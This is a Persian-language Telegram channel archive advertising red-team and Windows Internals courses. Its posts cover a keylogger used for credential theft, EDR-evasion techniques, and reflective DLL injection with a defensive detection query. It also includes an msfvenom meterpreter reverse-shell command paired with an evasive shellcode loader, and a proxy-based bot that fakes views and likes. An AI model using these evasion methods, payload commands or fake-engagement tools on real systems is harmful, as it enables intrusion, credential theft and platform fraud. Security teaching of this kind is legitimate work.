RedTeamAPT Academy
رفتن به کانال در Telegram
Topics: Red team (NetWork)❗️ coding(c,python,powershell,bash)🧑💻 Phishing 👂 Penetration testing 👁 vulnerability 🦠 Group : @RedTeamAcademyChat Admin : @RedTeamAdmin1 این کانال برای مباحث آموزشی میباشد و جنبه تخریب و اتک ندارد .
نمایش بیشترکشور مشخص نشده استدسته بندی مشخص نشده است
2 096
مشترکین
-5224 ساعت
-4597 روز
-2 47630 روز
آرشیو پست ها
2 096
+6
🦀 پیرو ابزار نویسی پست قبل (Rust)
🦀 خیلی سبک تر از burp suite
🦀 این ابزار در دست ارتقاست !
@RedTeamAcademy
2 096
+2
این ابزاری هست که با زبان rust نوشتم برای شکار مواردی که در وب هست
جا داره تا بیشتر کد بزنیم و به یه نسخه جمو جورburp suite شخصی برسه برای پروژه های تست نفوذ با قابلیت های بیشتر
پیدا کردن مسیر های مهم ، فایل ها ، دایرکتوری , HTTP Request/Response Inspector و ....
من همین الان با همین کلی داستان های عجیب از تو سایت ها بدست اوردم ! تو عکس مشخصه یسری هاش ....
این ابزار فقط با یک کلیک این موارد رو بهتون میده که بیشترش هم میشه کرد !
حالا برای os هم میشه با مکانیزم های دیگ نوشت که بره چیزای دیگ پیدا کنه !
@RedTeamAcademy
2 096
Offensive Rust Programming Course 👾
🦀 Philosophy & The Shift
🦀 Technical Mechanics (Ownership & Memory)
🦀 Red Team Perspective & Evasion
🦀 Counter-Strategy & Blue Team
@RedTeamAcademy
2 096
دوستانی که قصد درک بالا سیستم عامل و دور زدن انتی ویروس و edr هارو دارند
دوره windows internal پایه ای ترین دوره در این سطح هست .
ما در ادامه میریم سراغ دوره edr evading و قطعا پیش نیازش مباحث دوره Redteam ، windows internal ، اشنایی با زبان برنامه نویسی c , c++ هست .
نمیتونید بدون درک و شناخت وارد دوره های بعدی بشید ، خروجی براتون نداره
حالا دوره windows kernel programming که هیچی ...
.
🔴 پست قبل بخشی از دوره Windows Internal فصل چهارم بود
🔴 خرید و اطلاعات دوره (بدون VPN) :
🔴 دوره آموزشی Windows Internal با نگاه RedTeam
🔴 دوره آموزشی RedTeam
2 096
1️⃣ بخش اول: لایه کاربر (TEB - Thread Environment Block)
،آدرس پایه TEB (0x000000504BD1E000). جالب اینجاست که بلاک کل پروسس (PEB) هم دقیقاً در یک قدمی اون قرار داره! محدوده استک (Stack) این ترد هم مشخصه؛ یعنی ویندوز دقیقاً میدونه متغیرهای محلی این ترد کجای رم قرار دارن.
2️⃣ بخش دوم: لایه حفاظتشده کرنل (KTHREAD & ETHREAD)
این فضا ممنوعه است! برنامههای عادی حق ندارن مستقیم بهش نگاه کنن، اما با سوءاستفاده از APIهای پنهان ntdll.dll اطلاعاتش رو بیرون کشیدم:
🔹 بخش Thread Priority (KTHREAD): اولویت زمانبندی ترد رو نشون میده که پردازنده چقدر بهش بها میده (اینجا عدد 9 هست).
🔹 بخش Exit Status (ETHREAD): مقدارش ۲۵۹ یا همون STATUS_PENDING هست؛ یعنی ترد کماکان زنده و در حال اجراست!
🔹 بخش Kernel Mode Time: نزدیک ۳۱۲,۵۰۰ تیک پردازنده در سطح کرنل صرف لود کردن و تخصیص حافظه این ترد شده.
💡 بدافزارهای پیشرفته و ابزارهای ردتیم (Red Teaming) به جای صدا زدن APIهای رسمی ویندوز (که توسط آنتیویروسها هوک میشن)، مستقیم میان سراغ همین آدرسهای حافظه تا مخفیانه هویت خودشون رو جعل کنن یا دباگرها رو دور بزنن!
@RedTeamAcademy
2 096
🕵️♂️ بررسی یک Keylogger اما کاربردی از دیدگاه MalDev و Red Team بخشی از دوره Windows Internal (بدون vpn)
یک نمونه اسکریپت لایو از یک Window-Aware Keylogger رو که به زبان C++ نوشته شده در لینک های انتهایی پست مشاهده میکنید اما این ابزار دقیقاً چطور کار میکنه و در عملیاتهای تیم قرمز چه کاربردی داره؟
🔍 این keylogger چطور کار میکنه؟
برخلاف keylogger سنتی که فقط یک متن طولانی و نامفهوم از کلیدها پس میدن، این نمونه هوشمندتر عمل میکنه:
1. Window Tracking
2. Key Mapping & Logging
3. Contextual Output
---
🔥 در سناریوهای Red Teaming با این ابزار چه کارهایی میشه کرد؟
یک کیلاگر پنجره-محور در فاز Post-Exploitation یا دسترسی اولیه، اهداف زیر رو دنبال میکنه:
* سرقت اطلاعات حساس (Credential Harvesting): شکار نامهای کاربری، پسوردها و توکنهای احراز هویت به محض تایپ شدن در پنجرههای لاگین یا مرورگر.
* مانیتورینگ رفتار ادمین (Reconnaissance): همانطور که در تصویر مشخصه، مهاجم دقیقاً میبینه ادمین چه دستوراتی رو در PowerShell یا Run ویندوز وارد میکنه (مثلاً دستورات ابزارهای داخلی، جابهجایی در دایرکتوریها و...).
* کشف ساختار شبکه و سیستم: مانیتور کردن نام فایلها، تایتل پنجرههای باز و برنامههای کاستوم سازمانی که هدف ازشون استفاده میکنه.
https://www.linkedin.com/posts/omid-abiri-redteamapt_redteam-security-it-share-7480611260296957952-KgLd/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAAFjfyKoBT5fWVrc66SK8KuCpZMLK3C-Ecwc
2 096
باتوجه به شرایط فعلی که مشخص نیست مجدد جنگ شروع بشه یا خیر
و نت ها مجدد قطع بشه یا پایدار بمونه
دوستان تو بله میتونن با ما همراه بشن
در صورت قطع اینترنت فعالیت اونجا مجدد شروع میشه و الا در تلگرام فعالیت ما پابرجا خواهد بود
🆔 شناسه:
https://ble.ir/RedTeamAPT
2 096
همانطور که دیدید، کانالهای قبلی ما به خاطر انتشار سناریوهای عملی و اتکهای واقعی (Real-World) با ریپورت پلتفرم مواجه و بسته شدند. تلگرام روی این مدل محتوای حساس به شدت سختگیر است.
حیفه ین موارد ارشیو بشه فقط برای خودم ؛ به همین خاطر از این به بعد تمام گزارشهای فنی، تحلیل اتکهای واقعی و سناریوهای Red Teaming را با رعایت اصول محرمانگی در لینکدین منتشر میکنم. (دقیقا مثل قبل)
اولین کیس واقعی (کشف دسترسی و لو رفتن اطلاعات حساس زیرساخت مانیتورینگ گمرک) را همین امروز آپلود کردم.
اگر میخواهید تحلیلهای فنی و اتکهای واقعی را از این به بعد دنبال کنید، از طریق لینک زیر کانکت شوید:
www.linkedin.com/in/omid-abiri-redteamapt
2 096
فصل سوم از دوره Windows Internal با دید RedTeam منتشر شد.
فصل اول و دوم دوره نیز منتشر شده است.
نمونه ویدیو های دوره و توضیحات در سایت منتشر شده است .
تمامی ابزار ها و کد ها نوشته در دوره به دوستان ارسال میشود .
تهیه دوره : @RedTeamAdmin1
اطلاعات دوره : دوره آموزشی Windows Internal (بدون VPN)
2 096
چالش امنیتی: عملیات شبح (تزریق کد و دور زدن EDR) 💻🔥
🎯 سناریو:
شما به عنوان یک Red Teamer به یک سیستم Windows 10 x64 دسترسی (با دسترسی Administrator) پیدا کردهاید. هدف شما اجرای یک شلکد کوچک (مثلاً پاپآپ کردن calc.exe) در بستر یک فرآیند قانونی و در حال اجرا (مثل notepad.exe) است.
🛡 موانع (EDR سفارشی سیستم):
یک EDR سختگیر روی سیستم فعال است که مکانیزمهای دفاعی زیر را دارد:
1️⃣ User-Mode Hooking: توابع حساس مانند NtCreateThreadEx، NtWriteVirtualMemory، CreateRemoteThread و QueueUserAPC را در سطح User-Mode رهگیری میکند.
2️⃣ Heuristics & Memory Scanning: به شدت روی نواحی حافظه با مجوز RWX حساس است (به ویژه مموریهای Unbacked) و Call Stackها را برای پیدا کردن منشأ اجرای غیرطبیعی بررسی میکند.
3️⃣ Parent-Child Anomalies: ایجاد پروسههای جدید توسط پروسههای غیرمرتبط یا تزریقهای مشکوک بین پروسهای را مانیتور میکند.
🔴 برای دور زدن User-Mode Hooks:
باید به Direct Syscalls (مثل استفاده از ابزار SysWhispers) یا بهتر از آن Indirect Syscalls (برای طبیعی جلوه دادن Call Stack با پرش به ntdll.dll) اشاره کنند.
🔴 برای فرار از Memory Scanning (RWX و Unbacked Memory):
باید به جای VirtualAllocEx، از تکنیک Module Stomping / Module Overloading استفاده کنند. (یعنی یک DLL قانونی که استفاده نمیشود را در notepad.exe لود کنند و شلکد خود را روی بخش .text آن اوررایت (Overwrite) کنند تا حافظه، پشتوانه فایل فیزیکی یا همان File-backed داشته باشد و در نهایت با مجوز RX اجرا شود نه RWX).
🔴 برای فرار از Thread Creation (دور زدن مانیتورینگ EID 8 و APIها):
به جای ساخت Thread جدید، باید از تکنیک Thread Hijacking استفاده کنند (Suspend کردن یک Thread موجود در notepad، تغییر RIP به آدرس شلکد با SetThreadContext، و سپس Resume کردن آن).
🔴 گزینه جایگزین با توجه به دسترسی Admin:
چون دسترسی Admin دادید، استفاده از تکنیک BYOVD (Bring Your Own Vulnerable Driver) برای کور کردن موقت EDR از طریق Kernel-Mode هم یک جواب کاملاً معتبر و سطح بالاست!
🆔 @RedTeamAcademy
🌐https://redteamapt.ir
2 096
هنر دور زدن Sysmon (EID 7) با Reflective DLL Injection و چالشهای OPSEC
مهاجمان حرفهای علاقهای به جا گذاشتن ردپا روی دیسک ندارند. تزریق DLL بازتابی (Reflective DLL Injection) یک تکنیک پیشرفته است که به ما اجازه میدهد یک پیلود (مانند Cobalt Strike Beacon یا Meterpreter) را مستقیماً و به صورت دستی (Manual Mapping) داخل حافظه یک فرآیند هدف بارگذاری کنیم.
🔥 مزیت تهاجمی (چرا EID 7 دور زده میشود؟)
در حالت عادی، وقتی یک DLL لود میشود، سیستمعامل درگیر شده و Sysmon Event ID 7 (ImageLoad) لاگ میاندازد. اما شاهکار Reflective Injection این است که نیازی به توابع استاندارد ویندوز (مثل
LoadLibrary) ندارد. ماژول مخرب خودش نقش OS Loader را بازی کرده و وابستگیها را در حافظه حل میکند. نتیجه؟ سیستمعامل متوجه لود شدن ماژول جدید نمیشود، EID 7 به هیچ وجه تریگر نمیگردد، و رادارهای مبتنی بر مانیتورینگ ماژول کاملاً کور میشوند.
⚠️ خطاهای OPSEC و فرصتهای Blue Team
آیا با این روش کاملاً نامرئی هستیم؟ خیر! اگرچه لود شدن ماژول پنهان میماند، اما اجرای آن در فرآیند هدف نیازمند ایجاد یک Thread جدید است. مهاجمانی که از روشهای پایه برای تزریق استفاده میکنند، معمولاً روی Sysmon Event ID 8 (CreateRemoteThread) شکار میشوند.
همچنین، تخصیص حافظه از نوع PAGE_EXECUTE_READWRITE (RWX) که پشتوانه فایل فیزیکی روی دیسک (Unbacked Memory) ندارد، لقمه چرب و نرمی برای Memory Scannerهای ابزارهای EDR است.
🔍 شکار تهدید (دیدگاه Blue Team):
تیمهای دفاعی به جای جستجوی ماژولهای لود شده، باید به دنبال تزریقهای حافظه و Threadهای مشکوک بگردند. کوئری زیر (SPL/KQL-مانند) به دنبال پروسههایی میگردد که در حال تزریق Thread به پروسههای استاندارد ویندوز هستند:
EventID=8
| where TargetImage has_any ("explorer.exe", "svchost.exe", "rundll32.exe", "notepad.exe")
| where SourceImage != TargetImage
| project TimeGenerated, Hostname, SourceImage, TargetImage, StartAddress, StartFunction
💡 نکته پیشرفته برای Red Team:
برای ارتقای OPSEC و دور زدن هشدارهای EID 8 و اسکنرهای حافظه، مهاجمان پیشرفته به جای CreateRemoteThread از تکنیکهایی نظیر Thread Hijacking یا APC Injection (Early Bird) استفاده میکنند و برای فرار از حافظههای RWX به سراغ تکنیکهای Module Stomping میروند.
🆔 @RedTeamAcademy
🌐 https://RedTeamApt.ir2 096
🔴 لودر شلکد فوقالعاده گریزناپذیر برای Red Team
یک ابزار قدرتمند و نسبتاً جدید در حوزه Red Team که اخیراً توجه زیادی جلب کرده، Rattle هست. این ابزار یک Shellcode Loader Generator بسیار evasive محسوب میشه که مخصوص عملیات نفوذ و دور زدن تشخیص EDR/AV طراحی شده. هدف اصلیش اجرای شلکد دلخواه با حداقل ردپا و حداکثر پنهانکاری در سیستم هدف است.
قابلیتهای کلیدی:
- تولید لودرهای شلکد گریزناپذیر با تکنیکهای پیشرفته تزریق و بارگذاری حافظه
- پشتیبانی از روشهای تزریق متنوع: Process Hollowing ، Remote Process Injection و تخصیص حافظه سفارشی
- مبهمسازی (Obfuscation) قوی شلکد و منطق لودر برای سخت کردن تحلیل استاتیک و دینامیک
- تکنیکهای پیشرفته دور زدن EDR/AV شامل Direct Syscalls* ، *Dynamic Unhooking*، Memory Encryption و ...
- نوشتهشده با C/C++ برای کنترل سطح پایین و عملکرد بهینه
نحوه استفاده:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw -o payload.bin
.\Rattle.exe -s payload.bin -t hollow -o loader.exe
# -e : فعالسازی encryption
# -u : فعالسازی unhooking
لودر تولیدشده (loader.exe) رو روی هدف اجرا کنید و لذت ببرید! 🚀
---
🆔 @RedTeamAcademy
🌐 https://redteamacademy.ir2 096
RedTeam 🔴 vs 🔵 BlueTeam
بخشی از دوره Windows Internal فصل 3
Early Bird
Asynchronous Procedure Call
APC Queue
دوره های آموزشی (بدون VPN)
دوره آموزشی Windows Internal (بدون VPN)
راهنمایی و شرکت در دوره ها : @RedTeamAdmin1
@RedTeamAcademy
2 096
جنگ واقعی RedTeam و BlueTeam اینجا رخ میده .
بخشی از دوره Windows Internal فصل 3
دوره آموزشی Windows Internal
@RedTeamAcademy
2 096
RedTeam 🔴 vs 🔵 BlueTeam
دوستانی که دنبال مباحث پیشرفته (APT) هستند میتوانند این ویدیو رو که بخشی از فصل سوم دوره Windows Internal هست رو مشاهده کنند .
@RedTeamAcademy
2 096
+1
دیشب داشتم روی یه چیزی کار میکردم با پایتون
خودش میره رفتار انسان رو هر سایتی بخواییم شبیه سازی میکنه
کلید میکنه
اسکرول میکنه
جایی نیاز باشه میره پست یا ویدیویی رو لایک میکنه
بازدید میفرسته
از گوگل با این کلمه کلیدی ( مثلا : آموزش آشپزی 😅) وارد این سایت بشه
میتونید مدیریت ترد رو داشته باشید برای سرعت بیشتر
پراکسی تعریف کنید برای لو نرفتن
روی هر چنتا لینک و سایت و ....
بماند که من این رو برای یه کاری درست کردم😎
@RedTeamAcademy
2 096
تمامی کد ها و نوت ها ب دوستان تو همه دوره ها ارسال میشه
مخصوصا Windows Internal که بتونن روی کد ها کار کنن و متوجه ساختار بشن و .... !!!
دوستانی که تهیه کردند متوجه هستند که این کد ها پیاده سازی ..... هستند حتی کدی که در ادامه برای همین ویدیو تست میشه !!!
@RedTeamAcademy
2 096
بخشی از دوره Windows Internal فصل 3
به جرات میتونم بگم فصل 3 پر از نکته های این شکلی هست
دوستان BlueTeam , Red Team , Soc این ویدیو رو از دست ندید
فصل 1 و 2 دوره منتشر شده است
@RedTeamAcademy
